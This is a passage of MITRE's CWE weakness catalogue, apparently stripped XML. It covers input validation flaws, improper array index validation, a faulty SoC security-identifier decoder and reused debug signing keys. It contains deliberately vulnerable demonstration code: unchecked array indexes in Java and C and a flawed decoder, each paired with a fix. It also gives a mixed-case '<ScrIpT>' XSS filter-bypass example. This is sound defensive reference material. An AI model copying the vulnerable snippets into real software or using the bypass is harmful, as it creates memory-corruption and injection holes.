overflow */ - report(stderr, "Warning: ignoring bogus data for message sizes returned by server.\n"); - - - } - }... - - } - - - - In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index. - - - - // Method called from servlet to obtain product information - public String displayProductSummary(int index) { - - String productSummary = new String(""); - try {String productSummary = getProductSummary(index); - - } catch (Exception ex) {...} - return productSummary; - } - public String getProductSummary(int index) {return products[index];} - - In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code. - - - - // Method called from servlet to obtain product information - public String displayProductSummary(int index) { - - String productSummary = new String(""); - try {String productSummary = getProductSummary(index); - - } catch (Exception ex) {...} - return productSummary; - } - public String getProductSummary(int index) { - String productSummary = ""; - if ((index >= 0) && (index < MAX_PRODUCTS)) {productSummary = products[index];}else {System.err.println("index is out of bounds");throw new IndexOutOfBoundsException();} - return productSummary; - } - - An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds. - - ArrayList productArray = new ArrayList(MAX_PRODUCTS);...try {productSummary = (String) productArray.get(index);} catch (IndexOutOfBoundsException ex) {...} - - - - The following example asks a user for an offset into an array to select an item. - - - int main (int argc, char **argv) {char *items[] = {"boat", "car", "truck", "train"};int index = GetUntrustedOffset();printf("User selected %s\n", items[index-1]);} - - The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126). - - - - - CVE-2005-0369 - large ID in packet used as array index - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0369 - - - CVE-2001-1009 - negative array index as argument to POP LIST command - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1009 - - - - This entry is still under development and will continue to see updates and content improvements. - - - - CWE Content Team - MITRE - 2020-06-24 - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The product receives input that is expected to be well-formed - i.e., to comply with a certain syntax - but it does not validate or incorrectly validates that the input complies with the syntax. - - Often, complex inputs are expected to follow a particular syntax, which is either assumed by the input itself, or declared within metadata such as headers. The syntax could be for data exchange formats, markup languages, or even programming languages. When untrusted input is not properly validated for the expected syntax, attackers could cause parsing failures, trigger unexpected errors, or expose latent vulnerabilities that might not be directly exploitable if the input had conformed to the syntax. - - - - - - - - - - Implementation - - - - - Other - Varies by Context - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - High - - - - - The following code loads and parses an XML file. - - - - // Read DOM - try {...DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setValidating( false );....c_dom = factory.newDocumentBuilder().parse( xmlFile );} catch(Exception ex) {...} - - The XML file is loaded without validating it against a known XML Schema or DTD. - - - - - CVE-2007-5893 - HTTP request with missing protocol version number leads to crash - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5893 - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - CWE Content Team - MITRE - 2020-06-24 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type. - - When input does not comply with the expected type, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities that would not be possible if the input conformed with the expected type. - This weakness can appear in type-unsafe programming languages, or in programming languages that support casting or conversion of an input to another type. - - - - - - - - - - - - Implementation - - - - - Other - Varies by Context - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - High - - - - - CVE-2008-2223 - SQL injection through an ID that was supposed to be numeric. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223 - - - - This entry is still under development and will continue to see updates and content improvements. - - - - CWE Content Team - MITRE - 2020-06-24 - - - - - The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent. - - Some input data can be structured with multiple elements or fields that must be consistent with each other, e.g. a number-of-items field that is followed by the expected number of elements. When such complex inputs are inconsistent, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities. - - - - - - - - - - - Implementation - - - - - Other - Varies by Context - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - High - - - - - CVE-2018-16733 - product does not validate that the start block appears before the end block - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16733 - - - CVE-2006-3790 - size field that is inconsistent with packet size leads to buffer over-read - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3790 - - - CVE-2008-4114 - system crash with offset value that is inconsistent with packet size - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114 - - - - This entry is still under development and will continue to see updates and content improvements. - - - - CWE Content Team - MITRE - 2020-06-24 - - - - - The product receives an input value that is used as a resource identifier or other type of reference, but it does not validate or incorrectly validates that the input is equivalent to a potentially-unsafe value. - - Attackers can sometimes bypass input validation schemes by finding inputs that appear to be safe, but will be dangerous when processed at a lower layer or by a downstream component. For example, a simple XSS protection mechanism might try to validate that an input has no "<script>" tags using case-sensitive matching, but since HTML is case-insensitive when processed by web browsers, an attacker could inject "<ScrIpT>" and trigger XSS. - - - - - - - - - - - - Implementation - - - - - Other - Varies by Context - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - High - - - - - CVE-2005-0269 - File extension check in forum software only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0269 - - - CVE-2001-1238 - Task Manager does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1238 - - - CVE-2004-2214 - HTTP server allows bypass of access restrictions using URIs with mixed case. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2214 - - - - This entry is still under development and will continue to see updates and content improvements. - - - - CWE Content Team - MITRE - 2020-06-24 - - - - - The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array. - - - - - - - - - - Resultant - The most common condition situation leading to an out-of-bounds array index is the use of loop index variables as buffer indexes. If the end condition for the loop is subject to a flaw, the index can grow or shrink unbounded, therefore causing a buffer overflow or underflow. Another common situation leading to this condition is the use of a function's return value, or the resulting value of a calculation directly as an index in to a buffer. - - - - - - - - - - out-of-bounds array index - - - index-out-of-range - - - array index underflow - - - - - Implementation - - - High - - - Integrity - Availability - DoS: Crash, Exit, or Restart - Use of an index that is outside the bounds of an array will very likely result in the corruption of relevant memory and perhaps instructions, leading to a crash, if the values are outside of the valid memory area. - - - Integrity - Modify Memory - If the memory corrupted is data, rather than instructions, the system will continue to function with improper values. - - - Confidentiality - Integrity - Modify Memory - Read Memory - Use of an index that is outside the bounds of an array can also trigger out-of-bounds read or write operations, or operations on the wrong objects; i.e., "buffer overflows" are not always the result. This may result in the exposure or modification of sensitive data. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow and possibly without the use of large inputs if a precise index can be controlled. - - - Integrity - Availability - Confidentiality - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - Read Memory - Modify Memory - A single fault could allow either an overflow (CWE-788) or underflow (CWE-786) of the array index. What happens next will depend on the type of operation being performed out of bounds, but can expose sensitive information, cause a system crash, or possibly lead to arbitrary code execution. - - - - - Automated Static Analysis - - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report array index errors that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. - - High - This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Automated Dynamic Analysis - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - Black Box - Black box methods might not get the needed code coverage within limited time constraints, and a dynamic test might not produce any noticeable side effects even if it is successful. - - - - - Architecture and Design - Input Validation - Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173). - - - Architecture and Design - - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings. - - - - Requirements - Language Selection - - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, Ada allows the programmer to constrain the values of a variable and languages such as Java and Ruby will allow the programmer to handle exceptions when an out-of-bounds index is accessed. - - - - Operation - Environment Hardening - - Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. - Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. - - Defense in Depth - This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Operation - Environment Hardening - Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61]. - Defense in Depth - This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When accessing a user-controlled array index, use a stringent range of values that are within the target array. Make sure that you do not allow negative values to be used. That is, verify the minimum as well as the maximum of the range of acceptable values. - - - - Implementation - Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - - - In the code snippet below, an untrusted integer value is used to reference an object in an array. - - public String getValue(int index) {return array[index];} - - If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised. - - - The following example takes a user-supplied value to allocate an array of objects and then operates on the array. - - private void buildList ( int untrustedListSize ){if ( 0 > untrustedListSize ){die("Negative value supplied for list size, die evil hacker!");}Widget[] list = new Widget [ untrustedListSize ];list[0] = new Widget();} - - This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown. - - - In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method - - int getValueFromArray(int *array, int len, int index) { - - int value; - - // check that the array index is less than the maximum - - - // length of the array - if (index < len) { - - - // get the value at the specified index of the array - value = array[index]; - } - // if array index is invalid then output error message - - - // and return value indicating error - else {printf("Value is: %d\n", array[index]);value = -1;} - return value; - } - - However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below. - - - ... - - // check that the array index is within the correct - - - // range of values for the array - if (index >= 0 && index < len) { - ... - - - - The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index. - - - - /* capture the sizes of all messages */ - int getsizes(int sock, int count, int *sizes) { - ...char buf[BUFFER_SIZE];int ok;int num, size; - - // read values from socket and added to sizes array - while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){ - - - // continue read from socket until buf only contains '.' - if (DOTLINE(buf))break; - else if (sscanf(buf, "%d %d", &num, &size) == 2)sizes[num - 1] = size; - - }... - - } - - In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code. - - - - /* capture the sizes of all messages */ - int getsizes(int sock, int count, int *sizes) { - ...char buf[BUFFER_SIZE];int ok;int num, size; - - // read values from socket and added to sizes array - while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){ - - - // continue read from socket until buf only contains '.' - if (DOTLINE(buf))break; - else if (sscanf(buf, "%d %d", &num, &size) == 2) { - if (num > 0 && num <= (unsigned)count)sizes[num - 1] = size; - else - - - /* warn about possible attempt to induce buffer overflow */ - report(stderr, "Warning: ignoring bogus data for message sizes returned by server.\n"); - - - } - }... - - } - - - - In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index. - - - - // Method called from servlet to obtain product information - public String displayProductSummary(int index) { - - String productSummary = new String(""); - try {String productSummary = getProductSummary(index); - - } catch (Exception ex) {...} - return productSummary; - } - public String getProductSummary(int index) {return products[index];} - - In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code. - - - - // Method called from servlet to obtain product information - public String displayProductSummary(int index) { - - String productSummary = new String(""); - try {String productSummary = getProductSummary(index); - - } catch (Exception ex) {...} - return productSummary; - } - public String getProductSummary(int index) { - String productSummary = ""; - if ((index >= 0) && (index < MAX_PRODUCTS)) {productSummary = products[index];}else {System.err.println("index is out of bounds");throw new IndexOutOfBoundsException();} - return productSummary; - } - - An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds. - - ArrayList productArray = new ArrayList(MAX_PRODUCTS);...try {productSummary = (String) productArray.get(index);} catch (IndexOutOfBoundsException ex) {...} - - - - The following example asks a user for an offset into an array to select an item. - - - int main (int argc, char **argv) {char *items[] = {"boat", "car", "truck", "train"};int index = GetUntrustedOffset();printf("You selected %s\n", items[index-1]);} - - The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126). - - - - - CVE-2005-0369 - large ID in packet used as array index - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0369 - - - CVE-2001-1009 - negative array index as argument to POP LIST command - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1009 - - - CVE-2003-0721 - Integer signedness error leads to negative array index - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0721 - - - CVE-2004-1189 - product does not properly track a count and a maximum number, which can lead to resultant array index overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1189 - - - CVE-2007-5756 - Chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5756 - - - CVE-2005-2456 - Chain: array index error (CWE-129) leads to deadlock (CWE-833) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456 - - - - Memory - - - - Unchecked array indexing - - - INDEX - Array index overflow - - - ARR00-C - Understand how arrays work - - - ARR30-C - Do not form or use out-of-bounds pointers or array subscripts - CWE More Specific - - - ARR38-C - Do not add or subtract an integer to a pointer if the resulting value does not refer to a valid array element - - - INT32-C - Ensure that operations on signed integers do not result in overflow - - - IDS32-PL - Validate any integer that is used as an array index - Imprecise - - - ASCSM-CWE-129 - - - - - - - - - - - - - - - - - - - This weakness can precede uncontrolled memory allocation (CWE-789) in languages that automatically expand an array when an index is used that is larger than the size of the array, such as JavaScript. - An improperly validated array index might lead directly to the always-incorrect behavior of "access of array using out-of-bounds index." - - - - CLASP - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Common_Consequences, Observed_Examples, Other_Notes, Potential_Mitigations, Theoretical_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-02-16 - updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Common_Consequences, Demonstrative_Examples, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-09-19 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples, Potential_Mitigations, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References, Relationships - - Unchecked Array Indexing - - - - The product implements a decoding mechanism to decode certain bus-transaction signals to security identifiers. If the decoding is implemented incorrectly, then untrusted agents can now gain unauthorized access to the asset. - - In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. The security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes). A decoder decodes the bus transactions to map security identifiers into necessary access-controls/protections. - A common weakness that can exist in this scenario is incorrect decoding because an untrusted agent’s security identifier is decoded into a trusted agent’s security identifier. Thus, an untrusted agent previously without access to an asset can now gain access to the asset. - - - - - - - - - - - - - - - Implementation - - - Architecture and Design - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Memory - Read Memory - DoS: Resource Consumption (Other) - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Quality Degradation - High - - - - - Architecture and Design - Security identifier decoders must be reviewed for design consistency and common weaknesses. - - - Implementation - Access and programming flows must be tested in pre-silicon and post-silicon testing in order to check for this weakness. - - - - - - - Consider a system that has four bus masters and a decoder. The table below provides bus masters as well as their security identifiers and trust assumptions: - - - - - Bus Master - - - Security Identifier Decoding - - - Trust Assumptions - - - - - Master_0 - - - "00" - - - Untrusted - - - - - Master_1 - - - "01" - - - Trusted - - - - - Master_2 - - - "10" - - - Untrusted - - - - - Master_3 - - - "11" - - - Untrusted - - - - - The decoder is supposed to decode every bus transaction and assign a corresponding security identifier. The security identifier is used to determine accesses to the assets. - - - The bus transaction that contains the security information is Bus_transaction [15:14], and the bits 15 through 14 contain the security identifier in formation. - - - The assets are the AES-Key register’s AES key for encryption or decryption. The key is128 bits implemented as a set of four 32-bit registers. The key registers are assets, and register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls. -The access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. The size of the security identifier is 4 bits (i.e., bit 3 through 0. Each bit in these 4 bits defines a security identifier. There are only 4 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., “1”) allows respective action from an agent whose identity matches the number of the bit and, if “0” (i.e., Clear), disallows the respective action to that corresponding agent. - - - - - Register - - - Field description - - - - - AES_ENC_DEC_KEY_0 - - - AES key [0:31] for encryption or decryption -Default 0x00000000 - - - - - AES_ENC_DEC_KEY_1 - - - AES key [32:63] for encryption or decryption -Default 0x00000000 - - - - - AES_ENC_DEC_KEY_2 - - - AES key [64:95] for encryption or decryption -Default 0x00000000 - - - - - AES_ENC_DEC_KEY_3 - - - AES key [96:127] for encryption or decryption -Default 0x00000000 - - - - - AES_KEY_ACCESS_POLICY - - - [31:4] Default 0x000000 -[3:0] – 0x02 agent with Security Identifier “1” has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers - - - - - - - Pseudo Code - - If (AES_KEY_ACCESS_POLICY[Security_Identifier] == “1”) - - - Allow access to AES-Key registers - - - Else - - - Deny access to AES-Key registers - - - - - - Below is a decoder’s Pseudo code that only checks for bit [14] of the bus transaction to determine what Security Identifier it must assign. - - If (Bus_transaction[14] == “1”) - - - Security_Identifier == “1” - - - Else - - - Security_Identifier == “0” - - - - Upon close observation of the security identifiers and the above code, it looks like the Master_3, an untrusted agent, has access to the AES-Key registers in addition to the intended trusted Master_1 because both have their bit “0” set to “1”. - - - The decoder should check for the entire size of the security identifier in the bus-transaction signal to assign a corresponding security identifier. The following is good Pseudo code: - - If (Bus_transaction[15:14] == “00”) - - - Security_Identifier == “0” - - - If (Bus_transaction[15:14] == “01”) - - - Security_Identifier == “1” - - - If (Bus_transaction[15:14] == “10”) - - - Security_Identifier == “2” - - - If (Bus_transaction[15:14] == “11”) - - - Security_Identifier == “3” - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna - Intel Corporation - 2020-04-29 - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The same public key is used for signing both debug and production code. - - A common usage of public-key cryptography is to verify the integrity and authenticity of another entity (for example a firmware binary). If a company wants to ensure that its firmware runs only on its own hardware, before the firmware runs, an encrypted hash of the firmware image will be decrypted with the public key and then verified against the now-computed hash of the firmware image. This means that the public key forms the root of trust, which necessitates that the public key itself must be protected and used properly. - During the development phase, debug firmware enables many hardware debug hooks, debug modes, and debug messages for testing. Those debug facilities provide significant, additional views about the firmware’s capability and, in some cases, additional capability into the chip or SoC. If compromised, these capabilities could be exploited by an attacker to take full control of the system. - Once the product exits the manufacturing stage and enters production, it is good practice to use a different public key. Debug firmware images are known to leak. With the debug key being reused as the production key, the debug image will also work on the production image. Thus, it will open all the internal, debug capabilities to the attacker. - If a different public key is used for the production image, even if the attacker gains access to the debug firmware image, they will not be able to run it on a production machine. Thus, damage will be limited to the intellectual property leakage resulting from the debug image. - - - - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Access Control - Accountability - Authentication - Authorization - Non-Repudiation - Other - Read Memory - Modify Memory - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Varies by Context - High - - - - - Architecture or Design Review - - Compare the debug key with the production key to make sure that they are not the same. - - High - - - Dynamic Analysis with Manual Results Interpretation - - Compare the debug key with the production key to make sure that they are not the same. - - High - - - - - Implementation - Use different keys for Production and Debug - - - - - This example illustrates the danger of using the same public key for debug and production. - - Suppose the product design requires frugality of silicon real estate. Assume that originally the architecture allows just enough storage for two 2048-bit RSA keys in the fuse: one to be used for debug and the other for production. However, in the meantime, a business decision is taken to make the security future-proof beyond 2030, which means the architecture needs to use the NIST-recommended 3072-bit keys instead of the originally-planned 2048-bit keys. This means that, at most, one key can be fully stored in the fuses, not two. So the product design team decides to use the same public key for debug and production. - - Increase the storage so that two different keys of the required size can be stored. - - - - - Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi - Intel Corporation - 2020-05-26 - - - - - The product implements a conversion mechanism to map certain bus-transaction signals to security identifiers. However, if the conversion is incorrectly implemented, untrusted agents can gain unauthorized access to the asset. - - In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. This security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and 